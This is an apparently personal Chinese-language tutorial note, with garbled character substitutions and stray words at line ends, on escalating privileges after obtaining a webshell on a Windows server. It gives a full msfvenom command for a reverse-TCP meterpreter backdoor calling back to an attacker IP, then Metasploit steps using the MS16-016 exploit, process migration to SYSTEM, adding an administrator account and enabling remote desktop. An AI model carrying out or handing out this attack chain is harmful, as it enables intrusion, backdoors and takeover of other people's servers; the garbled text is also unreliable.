在WEB渗透中当咱们拿到webshell了,咱们能够试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的!web
咱们先用msfvenom生成一个EXE的木马后门。shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe
而后在到MSF根据刚才配置的木马后门进行监听...windows
而后在把木立刻传到服务器(受害者)的机器里,必须上传到可读可写的目录下哦,服务器
好比这里我吧abc.exe上传到了C:\users\leak\desktop\目录下,session
abc.exe就是我刚才生成的后门。tcp
而后在执行咱们的后门,能够看见MSF弹回了一个session 1(会话链接)。ui
说明咱们后门程序成功执行起来了,固然你也能够在webshell执行的,spa
但必须的有一点执行的权限哦。3d
getuid //能够看见咱们的权限很低的,通常都是user权限的,code
但也遇到过某些服务器执行后就直接是system最高权限。像这种咱们就直接加用户啦。
这里咱们是user权限,咱们要把它提高到system权限。Windows最高权限。
接着咱们输入命令
background //把你当前的metasploit shell转为后台执行。
search ms16 // 搜索关键字相关的漏洞
.....而后我选择了MS16-016这个漏洞在进行提权
use exploit/windows/local/ms16_016_webdav // 选择漏洞
show options //查看漏洞里边要设置的参数
能够看见只有一个SESSION参数要设置
set SESSION 1 // 设置会刚才咱们后门链接的ID号 1
exploit //执行提权...
能够看见成功的吧漏洞利用到了PID为692的进程中...
虽然提权成功了 但你getuid下仍是看见的是user权限
ps一下查看进程
根据刚才的提示找到PID 692的进程
能够看见确实是system权限
因此咱们还要用到migrate 命令 //迁移到一个指定的进程ID。
migrate 692 //
在getuid下能够看见为system权限啦
提权成功了
既然有了system权限 那咱们在添加帐号hack
添加为管理员组
用Nmap扫下并无开启远程登录3389
run getgui -e //开启目标主机3389 貌似这条MSF命令只对2003的系统有效 执行几回都没成功
因此就用cmd命令开了3389端口
提权成功,登陆服务器。。。。
简单的作个笔记,记性很差。